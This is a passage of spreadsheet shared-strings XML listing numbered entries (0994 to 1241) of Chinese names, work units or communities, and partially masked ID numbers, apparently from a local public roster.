    <t>0994</t>
  </si>
  <si>
    <t>刘明山</t>
  </si>
  <si>
    <t>411326********0097</t>
  </si>
  <si>
    <t>0995</t>
  </si>
  <si>
    <t>黄廷超</t>
  </si>
  <si>
    <t>412921********0211</t>
  </si>
  <si>
    <t>0996</t>
  </si>
  <si>
    <t>尹海军</t>
  </si>
  <si>
    <t>0997</t>
  </si>
  <si>
    <t>尹昭杨</t>
  </si>
  <si>
    <t>411321********0057</t>
  </si>
  <si>
    <t>0998</t>
  </si>
  <si>
    <t>张振</t>
  </si>
  <si>
    <t>0999</t>
  </si>
  <si>
    <t>张傲</t>
  </si>
  <si>
    <t>1000</t>
  </si>
  <si>
    <t>郑慎贵</t>
  </si>
  <si>
    <t>1001</t>
  </si>
  <si>
    <t>王立有</t>
  </si>
  <si>
    <t>1002</t>
  </si>
  <si>
    <t>王天春</t>
  </si>
  <si>
    <t>1003</t>
  </si>
  <si>
    <t>王中奕</t>
  </si>
  <si>
    <t>411321********5191</t>
  </si>
  <si>
    <t>1004</t>
  </si>
  <si>
    <t>王天秀</t>
  </si>
  <si>
    <t>1005</t>
  </si>
  <si>
    <t>王俊霞</t>
  </si>
  <si>
    <t>1006</t>
  </si>
  <si>
    <t>王环波</t>
  </si>
  <si>
    <t>1007</t>
  </si>
  <si>
    <t>王环宁</t>
  </si>
  <si>
    <t>411321********0213</t>
  </si>
  <si>
    <t>1008</t>
  </si>
  <si>
    <t>马先英</t>
  </si>
  <si>
    <t>1009</t>
  </si>
  <si>
    <t>李玉振</t>
  </si>
  <si>
    <t>1010</t>
  </si>
  <si>
    <t>蔡平</t>
  </si>
  <si>
    <t>1011</t>
  </si>
  <si>
    <t>黄金桂</t>
  </si>
  <si>
    <t>1012</t>
  </si>
  <si>
    <t>广电局中华办理</t>
  </si>
  <si>
    <t>查光丽</t>
  </si>
  <si>
    <t>412921********4025</t>
  </si>
  <si>
    <t>1013</t>
  </si>
  <si>
    <t>粮食局中华社区办理</t>
  </si>
  <si>
    <t>牛清波</t>
  </si>
  <si>
    <t>1014</t>
  </si>
  <si>
    <t>民政局中华社区办理</t>
  </si>
  <si>
    <t>杨清源</t>
  </si>
  <si>
    <t>411321********1537</t>
  </si>
  <si>
    <t>1015</t>
  </si>
  <si>
    <t>双鹏有限公司中华社区办理</t>
  </si>
  <si>
    <t>刘宏中</t>
  </si>
  <si>
    <t>1016</t>
  </si>
  <si>
    <t>税务局中华办理</t>
  </si>
  <si>
    <t>王云</t>
  </si>
  <si>
    <t>1017</t>
  </si>
  <si>
    <t>古中先</t>
  </si>
  <si>
    <t>1018</t>
  </si>
  <si>
    <t>古中伟</t>
  </si>
  <si>
    <t>1019</t>
  </si>
  <si>
    <t>地税所中华社区</t>
  </si>
  <si>
    <t>王新雨</t>
  </si>
  <si>
    <t>1020</t>
  </si>
  <si>
    <t>商业中心中华社区</t>
  </si>
  <si>
    <t>张保剑</t>
  </si>
  <si>
    <t>412921********0412</t>
  </si>
  <si>
    <t>1021</t>
  </si>
  <si>
    <t>农机局中华社区办理</t>
  </si>
  <si>
    <t>和青丽</t>
  </si>
  <si>
    <t>1022</t>
  </si>
  <si>
    <t>工商局中华社区办理</t>
  </si>
  <si>
    <t>杨丰</t>
  </si>
  <si>
    <t>1023</t>
  </si>
  <si>
    <t>印刷厂西北社区办理</t>
  </si>
  <si>
    <t>杨雪野</t>
  </si>
  <si>
    <t>1024</t>
  </si>
  <si>
    <t>供销社西北社区办理</t>
  </si>
  <si>
    <t>许世彤</t>
  </si>
  <si>
    <t>1025</t>
  </si>
  <si>
    <t>黄华</t>
  </si>
  <si>
    <t>1026</t>
  </si>
  <si>
    <t>商贸公司西北办理</t>
  </si>
  <si>
    <t>王家续</t>
  </si>
  <si>
    <t>1027</t>
  </si>
  <si>
    <t>新兴实业有限公司西北办理</t>
  </si>
  <si>
    <t>李强</t>
  </si>
  <si>
    <t>412921********3616</t>
  </si>
  <si>
    <t>1028</t>
  </si>
  <si>
    <t>物华交电公司中华办理</t>
  </si>
  <si>
    <t>卢长坤</t>
  </si>
  <si>
    <t>1029</t>
  </si>
  <si>
    <t>工信局中华办理</t>
  </si>
  <si>
    <t>朱捍洋</t>
  </si>
  <si>
    <t>412921********0113</t>
  </si>
  <si>
    <t>1030</t>
  </si>
  <si>
    <t>外贸局中华办理</t>
  </si>
  <si>
    <t>赵乾</t>
  </si>
  <si>
    <t>1031</t>
  </si>
  <si>
    <t>赵汉钦</t>
  </si>
  <si>
    <t>1032</t>
  </si>
  <si>
    <t>粮食局中华办理</t>
  </si>
  <si>
    <t>陈亮</t>
  </si>
  <si>
    <t>1033</t>
  </si>
  <si>
    <t>农机局中华办理</t>
  </si>
  <si>
    <t>闫永华</t>
  </si>
  <si>
    <t>1034</t>
  </si>
  <si>
    <t>运输公司民主办理</t>
  </si>
  <si>
    <t>张彦彬</t>
  </si>
  <si>
    <t>411321********0016</t>
  </si>
  <si>
    <t>1035</t>
  </si>
  <si>
    <t>缫丝厂中华办理</t>
  </si>
  <si>
    <t>张玉众</t>
  </si>
  <si>
    <t>411326********0018</t>
  </si>
  <si>
    <t>1036</t>
  </si>
  <si>
    <t>财险公司东北办理</t>
  </si>
  <si>
    <t>陈金玲</t>
  </si>
  <si>
    <t>1037</t>
  </si>
  <si>
    <t>二建南外办理</t>
  </si>
  <si>
    <t>刘杰炘</t>
  </si>
  <si>
    <t>411321********2434</t>
  </si>
  <si>
    <t>1038</t>
  </si>
  <si>
    <t>任付勤</t>
  </si>
  <si>
    <t>1039</t>
  </si>
  <si>
    <t>刘清峰</t>
  </si>
  <si>
    <t>1040</t>
  </si>
  <si>
    <t>张振全</t>
  </si>
  <si>
    <t>1041</t>
  </si>
  <si>
    <t>张华勤</t>
  </si>
  <si>
    <t>1042</t>
  </si>
  <si>
    <t>医药局西北办理</t>
  </si>
  <si>
    <t>赵现伟</t>
  </si>
  <si>
    <t>412921********4436</t>
  </si>
  <si>
    <t>1043</t>
  </si>
  <si>
    <t>陈清</t>
  </si>
  <si>
    <t>412921********4529</t>
  </si>
  <si>
    <t>1044</t>
  </si>
  <si>
    <t>冯朝忠</t>
  </si>
  <si>
    <t>412921********2412</t>
  </si>
  <si>
    <t>1045</t>
  </si>
  <si>
    <t>冯中良</t>
  </si>
  <si>
    <t>1046</t>
  </si>
  <si>
    <t>商业局西北办理</t>
  </si>
  <si>
    <t>武晓东</t>
  </si>
  <si>
    <t>1047</t>
  </si>
  <si>
    <t>物资局中华办理</t>
  </si>
  <si>
    <t>董秋生</t>
  </si>
  <si>
    <t>1048</t>
  </si>
  <si>
    <t>侯正阳</t>
  </si>
  <si>
    <t>1049</t>
  </si>
  <si>
    <t>农业局民主办理</t>
  </si>
  <si>
    <t>李假</t>
  </si>
  <si>
    <t>1050</t>
  </si>
  <si>
    <t>范永清</t>
  </si>
  <si>
    <t>1051</t>
  </si>
  <si>
    <t>刘中兰</t>
  </si>
  <si>
    <t>1052</t>
  </si>
  <si>
    <t>农业局（民主社区办理）</t>
  </si>
  <si>
    <t>周丰一</t>
  </si>
  <si>
    <t>1053</t>
  </si>
  <si>
    <t>郝钰淇</t>
  </si>
  <si>
    <t>1054</t>
  </si>
  <si>
    <t>二建（民主社区办理）</t>
  </si>
  <si>
    <t>程远秀</t>
  </si>
  <si>
    <t>1055</t>
  </si>
  <si>
    <t>二建（南外社区办理）</t>
  </si>
  <si>
    <t>412921********2837</t>
  </si>
  <si>
    <t>1056</t>
  </si>
  <si>
    <t>方利霞</t>
  </si>
  <si>
    <t>1057</t>
  </si>
  <si>
    <t>贺天属</t>
  </si>
  <si>
    <t>411326********0057</t>
  </si>
  <si>
    <t>1058</t>
  </si>
  <si>
    <t>物资局（中华办理）</t>
  </si>
  <si>
    <t>赵会平</t>
  </si>
  <si>
    <t>412921********3344</t>
  </si>
  <si>
    <t>1059</t>
  </si>
  <si>
    <t>西北二组</t>
  </si>
  <si>
    <t>孙月</t>
  </si>
  <si>
    <t>1060</t>
  </si>
  <si>
    <t>砖瓦厂北外办理</t>
  </si>
  <si>
    <t>王付太</t>
  </si>
  <si>
    <t>412921********1552</t>
  </si>
  <si>
    <t>1061</t>
  </si>
  <si>
    <t>赵锋远</t>
  </si>
  <si>
    <t>1062</t>
  </si>
  <si>
    <t>庆晓丽</t>
  </si>
  <si>
    <t>1063</t>
  </si>
  <si>
    <t>郭曾懋</t>
  </si>
  <si>
    <t>411326********0019</t>
  </si>
  <si>
    <t>1064</t>
  </si>
  <si>
    <t>饮食服务公司中华办理</t>
  </si>
  <si>
    <t>李梓豪</t>
  </si>
  <si>
    <t>411321********5330</t>
  </si>
  <si>
    <t>1065</t>
  </si>
  <si>
    <t>李梓瑜</t>
  </si>
  <si>
    <t>1066</t>
  </si>
  <si>
    <t>蚕业局中华办理</t>
  </si>
  <si>
    <t>陈玉修</t>
  </si>
  <si>
    <t>1067</t>
  </si>
  <si>
    <t>王佳妮</t>
  </si>
  <si>
    <t>1068</t>
  </si>
  <si>
    <t>剧团西北办理</t>
  </si>
  <si>
    <t>田宏兴</t>
  </si>
  <si>
    <t>1069</t>
  </si>
  <si>
    <t>田红瑞</t>
  </si>
  <si>
    <t>412921********552X</t>
  </si>
  <si>
    <t>1070</t>
  </si>
  <si>
    <t>朱秀勤</t>
  </si>
  <si>
    <t>1071</t>
  </si>
  <si>
    <t>丁峰</t>
  </si>
  <si>
    <t>1072</t>
  </si>
  <si>
    <t>丁照航</t>
  </si>
  <si>
    <t>1073</t>
  </si>
  <si>
    <t>杨立英</t>
  </si>
  <si>
    <t>1074</t>
  </si>
  <si>
    <t>林业局（北外办理）</t>
  </si>
  <si>
    <t>王昌昊</t>
  </si>
  <si>
    <t>411321********6117</t>
  </si>
  <si>
    <t>1075</t>
  </si>
  <si>
    <t>巢丝厂（民主办理）</t>
  </si>
  <si>
    <t>王军</t>
  </si>
  <si>
    <t>1076</t>
  </si>
  <si>
    <t>法院（民主社区办理）</t>
  </si>
  <si>
    <t>田周文</t>
  </si>
  <si>
    <t>411321********0318</t>
  </si>
  <si>
    <t>1077</t>
  </si>
  <si>
    <t>田周武</t>
  </si>
  <si>
    <t>411321********0334</t>
  </si>
  <si>
    <t>1078</t>
  </si>
  <si>
    <t>榆木厂（民主办理）</t>
  </si>
  <si>
    <t>李振晓</t>
  </si>
  <si>
    <t>1079</t>
  </si>
  <si>
    <t>岳朝昱</t>
  </si>
  <si>
    <t>1080</t>
  </si>
  <si>
    <t>赵俊峰</t>
  </si>
  <si>
    <t>412921********5825</t>
  </si>
  <si>
    <t>1081</t>
  </si>
  <si>
    <t>饮食服务公司（ 中华办理）</t>
  </si>
  <si>
    <t>张青</t>
  </si>
  <si>
    <t>411326********0049</t>
  </si>
  <si>
    <t>1082</t>
  </si>
  <si>
    <t>蚕业局（中华办理）</t>
  </si>
  <si>
    <t>刘玉忠</t>
  </si>
  <si>
    <t>1083</t>
  </si>
  <si>
    <t>向瑞刚</t>
  </si>
  <si>
    <t>1084</t>
  </si>
  <si>
    <t>党龙咸</t>
  </si>
  <si>
    <t>1085</t>
  </si>
  <si>
    <t>王淑敏</t>
  </si>
  <si>
    <t>1086</t>
  </si>
  <si>
    <t>李雨欣</t>
  </si>
  <si>
    <t>411322********1348</t>
  </si>
  <si>
    <t>1087</t>
  </si>
  <si>
    <t>水利局（中华办理）</t>
  </si>
  <si>
    <t>李崇高</t>
  </si>
  <si>
    <t>411321********2815</t>
  </si>
  <si>
    <t>1088</t>
  </si>
  <si>
    <t>杨景玲</t>
  </si>
  <si>
    <t>412921********3361</t>
  </si>
  <si>
    <t>1089</t>
  </si>
  <si>
    <t>房管局（中华办理）</t>
  </si>
  <si>
    <t>焦心霞</t>
  </si>
  <si>
    <t>1090</t>
  </si>
  <si>
    <t>电线厂（中华办理）</t>
  </si>
  <si>
    <t>王小京</t>
  </si>
  <si>
    <t>1091</t>
  </si>
  <si>
    <t>外贸局（中华办理）</t>
  </si>
  <si>
    <t>陈莉</t>
  </si>
  <si>
    <t>1092</t>
  </si>
  <si>
    <t>木器厂（中华办理）</t>
  </si>
  <si>
    <t>陈建德</t>
  </si>
  <si>
    <t>1093</t>
  </si>
  <si>
    <t>李士伟</t>
  </si>
  <si>
    <t>1094</t>
  </si>
  <si>
    <t>刘龙圃</t>
  </si>
  <si>
    <t>412921********3629</t>
  </si>
  <si>
    <t>1095</t>
  </si>
  <si>
    <t>张平</t>
  </si>
  <si>
    <t>412921********0427</t>
  </si>
  <si>
    <t>1096</t>
  </si>
  <si>
    <t>周庆焕</t>
  </si>
  <si>
    <t>1097</t>
  </si>
  <si>
    <t>蔺玉华</t>
  </si>
  <si>
    <t>1098</t>
  </si>
  <si>
    <t>巢丝厂（中华办理）</t>
  </si>
  <si>
    <t>姚玉伟</t>
  </si>
  <si>
    <t>412921********5252</t>
  </si>
  <si>
    <t>1099</t>
  </si>
  <si>
    <t>水文站（南外办理）</t>
  </si>
  <si>
    <t>段国祥</t>
  </si>
  <si>
    <t>412921********2812</t>
  </si>
  <si>
    <t>1100</t>
  </si>
  <si>
    <t>木材公司（中华办理）</t>
  </si>
  <si>
    <t>周万吉</t>
  </si>
  <si>
    <t>412921********3618</t>
  </si>
  <si>
    <t>1101</t>
  </si>
  <si>
    <t>新华书店（西北办理）</t>
  </si>
  <si>
    <t>412921********3638</t>
  </si>
  <si>
    <t>1102</t>
  </si>
  <si>
    <t>黄瑞芳</t>
  </si>
  <si>
    <t>1103</t>
  </si>
  <si>
    <t>李翘楚</t>
  </si>
  <si>
    <t>411326********1523</t>
  </si>
  <si>
    <t>1104</t>
  </si>
  <si>
    <t>张海顺</t>
  </si>
  <si>
    <t>1105</t>
  </si>
  <si>
    <t>民政局（中华社区）</t>
  </si>
  <si>
    <t>杨立兰</t>
  </si>
  <si>
    <t>1106</t>
  </si>
  <si>
    <t>张家立</t>
  </si>
  <si>
    <t>1107</t>
  </si>
  <si>
    <t>黄金局（东北社区）</t>
  </si>
  <si>
    <t>毛庆秋</t>
  </si>
  <si>
    <t>1108</t>
  </si>
  <si>
    <t>褚清玉</t>
  </si>
  <si>
    <t>1109</t>
  </si>
  <si>
    <t>范梓霖</t>
  </si>
  <si>
    <t>411326********0028</t>
  </si>
  <si>
    <t>1110</t>
  </si>
  <si>
    <t>刘发勤</t>
  </si>
  <si>
    <t>1111</t>
  </si>
  <si>
    <t>潘伟</t>
  </si>
  <si>
    <t>1112</t>
  </si>
  <si>
    <t>孙若童</t>
  </si>
  <si>
    <t>411321********622X</t>
  </si>
  <si>
    <t>1113</t>
  </si>
  <si>
    <t>朱振全</t>
  </si>
  <si>
    <t>1114</t>
  </si>
  <si>
    <t>砖瓦厂（北外办理）</t>
  </si>
  <si>
    <t>张富权</t>
  </si>
  <si>
    <t>411321********0512</t>
  </si>
  <si>
    <t>1115</t>
  </si>
  <si>
    <t>曾志群</t>
  </si>
  <si>
    <t>412921********0546</t>
  </si>
  <si>
    <t>1116</t>
  </si>
  <si>
    <t>张奇云</t>
  </si>
  <si>
    <t>1117</t>
  </si>
  <si>
    <t>李忠</t>
  </si>
  <si>
    <t>1118</t>
  </si>
  <si>
    <t>商务局（中华办理）</t>
  </si>
  <si>
    <t>仝岩</t>
  </si>
  <si>
    <t>412921********151X</t>
  </si>
  <si>
    <t>1119</t>
  </si>
  <si>
    <t>仝闻铎</t>
  </si>
  <si>
    <t>1120</t>
  </si>
  <si>
    <t>郭延申</t>
  </si>
  <si>
    <t>1121</t>
  </si>
  <si>
    <t>方彬彬</t>
  </si>
  <si>
    <t>1122</t>
  </si>
  <si>
    <t>司法局（中华办理）</t>
  </si>
  <si>
    <t>郝依依</t>
  </si>
  <si>
    <t>411321********556X</t>
  </si>
  <si>
    <t>1123</t>
  </si>
  <si>
    <t>席文德</t>
  </si>
  <si>
    <t>1124</t>
  </si>
  <si>
    <t>吴鹏</t>
  </si>
  <si>
    <t>1125</t>
  </si>
  <si>
    <t>民主社区</t>
  </si>
  <si>
    <t>王文晨</t>
  </si>
  <si>
    <t>411326********0051</t>
  </si>
  <si>
    <t>1126</t>
  </si>
  <si>
    <t>吴志山</t>
  </si>
  <si>
    <t>412921********0111</t>
  </si>
  <si>
    <t>1127</t>
  </si>
  <si>
    <t>张新</t>
  </si>
  <si>
    <t>1128</t>
  </si>
  <si>
    <t>樊锋</t>
  </si>
  <si>
    <t>411326********0035</t>
  </si>
  <si>
    <t>1129</t>
  </si>
  <si>
    <t>樊思彤</t>
  </si>
  <si>
    <t>411321********0040</t>
  </si>
  <si>
    <t>1130</t>
  </si>
  <si>
    <t>王旺</t>
  </si>
  <si>
    <t>1131</t>
  </si>
  <si>
    <t>机械厂（中华办理）</t>
  </si>
  <si>
    <t>黄荣范</t>
  </si>
  <si>
    <t>1132</t>
  </si>
  <si>
    <t>刘小梅</t>
  </si>
  <si>
    <t>1133</t>
  </si>
  <si>
    <t>郭洪霞</t>
  </si>
  <si>
    <t>1134</t>
  </si>
  <si>
    <t>刘国清</t>
  </si>
  <si>
    <t>1135</t>
  </si>
  <si>
    <t>张聚风</t>
  </si>
  <si>
    <t>1136</t>
  </si>
  <si>
    <t>吴桂荣</t>
  </si>
  <si>
    <t>1137</t>
  </si>
  <si>
    <t>二建（中华办理）</t>
  </si>
  <si>
    <t>聂建伟</t>
  </si>
  <si>
    <t>1138</t>
  </si>
  <si>
    <t>缫丝厂（中华办理）</t>
  </si>
  <si>
    <t>曹媛</t>
  </si>
  <si>
    <t>1139</t>
  </si>
  <si>
    <t>高志国</t>
  </si>
  <si>
    <t>412921********3619</t>
  </si>
  <si>
    <t>1140</t>
  </si>
  <si>
    <t>李明会</t>
  </si>
  <si>
    <t>1141</t>
  </si>
  <si>
    <t>孙建叶</t>
  </si>
  <si>
    <t>1142</t>
  </si>
  <si>
    <t>张珂</t>
  </si>
  <si>
    <t>1143</t>
  </si>
  <si>
    <t>王伟</t>
  </si>
  <si>
    <t>1144</t>
  </si>
  <si>
    <t>粮局（中华办理）</t>
  </si>
  <si>
    <t>蔡长兰</t>
  </si>
  <si>
    <t>412921********0420</t>
  </si>
  <si>
    <t>1145</t>
  </si>
  <si>
    <t>中华四组</t>
  </si>
  <si>
    <t>崔建东</t>
  </si>
  <si>
    <t>1146</t>
  </si>
  <si>
    <t>陈舒</t>
  </si>
  <si>
    <t>1147</t>
  </si>
  <si>
    <t>谷秀宽</t>
  </si>
  <si>
    <t>1148</t>
  </si>
  <si>
    <t>杜平</t>
  </si>
  <si>
    <t>1149</t>
  </si>
  <si>
    <t>配件厂（中华社区）</t>
  </si>
  <si>
    <t>曾泓晔</t>
  </si>
  <si>
    <t>411321********0293</t>
  </si>
  <si>
    <t>2025年4月</t>
  </si>
  <si>
    <t>1150</t>
  </si>
  <si>
    <t>曹振甫</t>
  </si>
  <si>
    <t>412921********3333</t>
  </si>
  <si>
    <t>1151</t>
  </si>
  <si>
    <t>李小锋</t>
  </si>
  <si>
    <t>412322********4822</t>
  </si>
  <si>
    <t>1152</t>
  </si>
  <si>
    <t>董可鑫</t>
  </si>
  <si>
    <t>411321********0127</t>
  </si>
  <si>
    <t>2025年5月</t>
  </si>
  <si>
    <t>1153</t>
  </si>
  <si>
    <t>董若琳</t>
  </si>
  <si>
    <t>411321********0340</t>
  </si>
  <si>
    <t>1154</t>
  </si>
  <si>
    <t>中华</t>
  </si>
  <si>
    <t>王付珍</t>
  </si>
  <si>
    <t>1155</t>
  </si>
  <si>
    <t>许秀芝</t>
  </si>
  <si>
    <t>1156</t>
  </si>
  <si>
    <t>刘会焕</t>
  </si>
  <si>
    <t>412921********0108</t>
  </si>
  <si>
    <t>1157</t>
  </si>
  <si>
    <t>崔峥嵘</t>
  </si>
  <si>
    <t>1158</t>
  </si>
  <si>
    <t>孙国歧</t>
  </si>
  <si>
    <t>412921********403X</t>
  </si>
  <si>
    <t>1159</t>
  </si>
  <si>
    <t>城郊乡</t>
  </si>
  <si>
    <t>任秀婷</t>
  </si>
  <si>
    <t>412921********4465</t>
  </si>
  <si>
    <t>4113210299</t>
  </si>
  <si>
    <t>1160</t>
  </si>
  <si>
    <t>任成法</t>
  </si>
  <si>
    <t>412921********4454</t>
  </si>
  <si>
    <t>1161</t>
  </si>
  <si>
    <t>胡俊相</t>
  </si>
  <si>
    <t>412921********0411</t>
  </si>
  <si>
    <t>1162</t>
  </si>
  <si>
    <t>胡国森</t>
  </si>
  <si>
    <t>411321********0056</t>
  </si>
  <si>
    <t>1163</t>
  </si>
  <si>
    <t>靳小虎</t>
  </si>
  <si>
    <t>412921********0432</t>
  </si>
  <si>
    <t>1164</t>
  </si>
  <si>
    <t>靳小青</t>
  </si>
  <si>
    <t>412921********0423</t>
  </si>
  <si>
    <t>1165</t>
  </si>
  <si>
    <t>段洪如</t>
  </si>
  <si>
    <t>1166</t>
  </si>
  <si>
    <t>张自修</t>
  </si>
  <si>
    <t>412921********6034</t>
  </si>
  <si>
    <t>1167</t>
  </si>
  <si>
    <t>刘元正</t>
  </si>
  <si>
    <t>412921********061X</t>
  </si>
  <si>
    <t>1168</t>
  </si>
  <si>
    <t>冯居萍</t>
  </si>
  <si>
    <t>1169</t>
  </si>
  <si>
    <t>董亚涵</t>
  </si>
  <si>
    <t>411321********3628</t>
  </si>
  <si>
    <t>1170</t>
  </si>
  <si>
    <t>吴国敏</t>
  </si>
  <si>
    <t>1171</t>
  </si>
  <si>
    <t>韩国欣</t>
  </si>
  <si>
    <t>412921********0434</t>
  </si>
  <si>
    <t>1172</t>
  </si>
  <si>
    <t>段召运</t>
  </si>
  <si>
    <t>1173</t>
  </si>
  <si>
    <t>岳良</t>
  </si>
  <si>
    <t>412921********0453</t>
  </si>
  <si>
    <t>1174</t>
  </si>
  <si>
    <t>岳凡杰</t>
  </si>
  <si>
    <t>411326********0419</t>
  </si>
  <si>
    <t>1175</t>
  </si>
  <si>
    <t>周敏</t>
  </si>
  <si>
    <t>1176</t>
  </si>
  <si>
    <t>宋学礼</t>
  </si>
  <si>
    <t>412921********0414</t>
  </si>
  <si>
    <t>1177</t>
  </si>
  <si>
    <t>杨之丽</t>
  </si>
  <si>
    <t>1178</t>
  </si>
  <si>
    <t>杨双琳</t>
  </si>
  <si>
    <t>411321********0412</t>
  </si>
  <si>
    <t>1179</t>
  </si>
  <si>
    <t>城郊校委会</t>
  </si>
  <si>
    <t>尚兴龙</t>
  </si>
  <si>
    <t>412921********1117</t>
  </si>
  <si>
    <t>1180</t>
  </si>
  <si>
    <t>王娜</t>
  </si>
  <si>
    <t>412921********0443</t>
  </si>
  <si>
    <t>1181</t>
  </si>
  <si>
    <t>前庄村</t>
  </si>
  <si>
    <t>栗荣根</t>
  </si>
  <si>
    <t>1182</t>
  </si>
  <si>
    <t>尹语欣</t>
  </si>
  <si>
    <t>411321********0467</t>
  </si>
  <si>
    <t>1183</t>
  </si>
  <si>
    <t>尹学桦</t>
  </si>
  <si>
    <t>411321********0407</t>
  </si>
  <si>
    <t>1184</t>
  </si>
  <si>
    <t>尹学森</t>
  </si>
  <si>
    <t>411321********0215</t>
  </si>
  <si>
    <t>1185</t>
  </si>
  <si>
    <t>闫沟村</t>
  </si>
  <si>
    <t>屈向军</t>
  </si>
  <si>
    <t>412921********0417</t>
  </si>
  <si>
    <t>1186</t>
  </si>
  <si>
    <t>城郊供销社</t>
  </si>
  <si>
    <t>1187</t>
  </si>
  <si>
    <t>彭中盈</t>
  </si>
  <si>
    <t>412921********0425</t>
  </si>
  <si>
    <t>1188</t>
  </si>
  <si>
    <t>留山镇</t>
  </si>
  <si>
    <t>刘喜中</t>
  </si>
  <si>
    <t>412921********0731</t>
  </si>
  <si>
    <t>1189</t>
  </si>
  <si>
    <t>刘得荣</t>
  </si>
  <si>
    <t>412921********0726</t>
  </si>
  <si>
    <t>1190</t>
  </si>
  <si>
    <t>唐花林</t>
  </si>
  <si>
    <t>412921********0725</t>
  </si>
  <si>
    <t>1191</t>
  </si>
  <si>
    <t>王奎</t>
  </si>
  <si>
    <t>412921********0735</t>
  </si>
  <si>
    <t>1192</t>
  </si>
  <si>
    <t>刘长荣</t>
  </si>
  <si>
    <t>412921********0723</t>
  </si>
  <si>
    <t>1193</t>
  </si>
  <si>
    <t>赵玉焕</t>
  </si>
  <si>
    <t>412921********0721</t>
  </si>
  <si>
    <t>1194</t>
  </si>
  <si>
    <t>班凤香</t>
  </si>
  <si>
    <t>412921********0722</t>
  </si>
  <si>
    <t>1195</t>
  </si>
  <si>
    <t>唐青林</t>
  </si>
  <si>
    <t>412921********0713</t>
  </si>
  <si>
    <t>1196</t>
  </si>
  <si>
    <t>任德珍</t>
  </si>
  <si>
    <t>1197</t>
  </si>
  <si>
    <t>王朝玲</t>
  </si>
  <si>
    <t>412921********2488</t>
  </si>
  <si>
    <t>1198</t>
  </si>
  <si>
    <t>焦成梅</t>
  </si>
  <si>
    <t>1199</t>
  </si>
  <si>
    <t>余长青</t>
  </si>
  <si>
    <t>412921********0733</t>
  </si>
  <si>
    <t>1200</t>
  </si>
  <si>
    <t>余付云</t>
  </si>
  <si>
    <t>411321********2847</t>
  </si>
  <si>
    <t>1201</t>
  </si>
  <si>
    <t>郭伟</t>
  </si>
  <si>
    <t>412921********043X</t>
  </si>
  <si>
    <t>1202</t>
  </si>
  <si>
    <t>黄志平</t>
  </si>
  <si>
    <t>1203</t>
  </si>
  <si>
    <t>刘长聚</t>
  </si>
  <si>
    <t>412921********0734</t>
  </si>
  <si>
    <t>1204</t>
  </si>
  <si>
    <t>仝运焕</t>
  </si>
  <si>
    <t>412921********092X</t>
  </si>
  <si>
    <t>1205</t>
  </si>
  <si>
    <t>郭玉花</t>
  </si>
  <si>
    <t>412921********0727</t>
  </si>
  <si>
    <t>1206</t>
  </si>
  <si>
    <t>刘长德</t>
  </si>
  <si>
    <t>412921********0736</t>
  </si>
  <si>
    <t>1207</t>
  </si>
  <si>
    <t>唐合林</t>
  </si>
  <si>
    <t>412921********0730</t>
  </si>
  <si>
    <t>1208</t>
  </si>
  <si>
    <t>张德玲</t>
  </si>
  <si>
    <t>412921********2449</t>
  </si>
  <si>
    <t>1209</t>
  </si>
  <si>
    <t>杨德敏</t>
  </si>
  <si>
    <t>412921********0719</t>
  </si>
  <si>
    <t>1210</t>
  </si>
  <si>
    <t>许九梅</t>
  </si>
  <si>
    <t>412921********0720</t>
  </si>
  <si>
    <t>1211</t>
  </si>
  <si>
    <t>王永周</t>
  </si>
  <si>
    <t>412921********071X</t>
  </si>
  <si>
    <t>1212</t>
  </si>
  <si>
    <t>董兰</t>
  </si>
  <si>
    <t>412921********0785</t>
  </si>
  <si>
    <t>1213</t>
  </si>
  <si>
    <t>唐森林</t>
  </si>
  <si>
    <t>412921********0715</t>
  </si>
  <si>
    <t>1214</t>
  </si>
  <si>
    <t>冯付英</t>
  </si>
  <si>
    <t>412921********0745</t>
  </si>
  <si>
    <t>1215</t>
  </si>
  <si>
    <t>唐树林</t>
  </si>
  <si>
    <t>412921********0739</t>
  </si>
  <si>
    <t>1216</t>
  </si>
  <si>
    <t>孙士青</t>
  </si>
  <si>
    <t>412921********0764</t>
  </si>
  <si>
    <t>1217</t>
  </si>
  <si>
    <t>杨清然</t>
  </si>
  <si>
    <t>412921********0714</t>
  </si>
  <si>
    <t>1218</t>
  </si>
  <si>
    <t>杜长连</t>
  </si>
  <si>
    <t>1219</t>
  </si>
  <si>
    <t>孙五</t>
  </si>
  <si>
    <t>1220</t>
  </si>
  <si>
    <t>1221</t>
  </si>
  <si>
    <t>唐拴林</t>
  </si>
  <si>
    <t>412921********0716</t>
  </si>
  <si>
    <t>1222</t>
  </si>
  <si>
    <t>孟庆海</t>
  </si>
  <si>
    <t>412921********0738</t>
  </si>
  <si>
    <t>1223</t>
  </si>
  <si>
    <t>李桂琴</t>
  </si>
  <si>
    <t>1224</t>
  </si>
  <si>
    <t>刘亮中</t>
  </si>
  <si>
    <t>412921********0737</t>
  </si>
  <si>
    <t>1225</t>
  </si>
  <si>
    <t>张全华</t>
  </si>
  <si>
    <t>412921********0803</t>
  </si>
  <si>
    <t>1226</t>
  </si>
  <si>
    <t>王树欣</t>
  </si>
  <si>
    <t>412921********0748</t>
  </si>
  <si>
    <t>1227</t>
  </si>
  <si>
    <t>刘元中</t>
  </si>
  <si>
    <t>412921********0755</t>
  </si>
  <si>
    <t>1228</t>
  </si>
  <si>
    <t>刘青中</t>
  </si>
  <si>
    <t>1229</t>
  </si>
  <si>
    <t xml:space="preserve">郭金瑞 </t>
  </si>
  <si>
    <t>1230</t>
  </si>
  <si>
    <t>刘运中</t>
  </si>
  <si>
    <t>1231</t>
  </si>
  <si>
    <t>刘正中</t>
  </si>
  <si>
    <t>1232</t>
  </si>
  <si>
    <t>刘明中</t>
  </si>
  <si>
    <t>412921********0753</t>
  </si>
  <si>
    <t>1233</t>
  </si>
  <si>
    <t>唐畄拴</t>
  </si>
  <si>
    <t>412921********0732</t>
  </si>
  <si>
    <t>1234</t>
  </si>
  <si>
    <t>王坤</t>
  </si>
  <si>
    <t>412921********0717</t>
  </si>
  <si>
    <t>1235</t>
  </si>
  <si>
    <t>王运秀</t>
  </si>
  <si>
    <t>1236</t>
  </si>
  <si>
    <t>唐松林</t>
  </si>
  <si>
    <t>412921********0712</t>
  </si>
  <si>
    <t>1237</t>
  </si>
  <si>
    <t>张明云</t>
  </si>
  <si>
    <t>412921********0767</t>
  </si>
  <si>
    <t>1238</t>
  </si>
  <si>
    <t>唐军</t>
  </si>
  <si>
    <t>411326********0756</t>
  </si>
  <si>
    <t>1239</t>
  </si>
  <si>
    <t>刘明义</t>
  </si>
  <si>
    <t>1240</t>
  </si>
  <si>
    <t>刘国中</t>
  </si>
  <si>
    <t>1241</t>
  </si>
  <si>
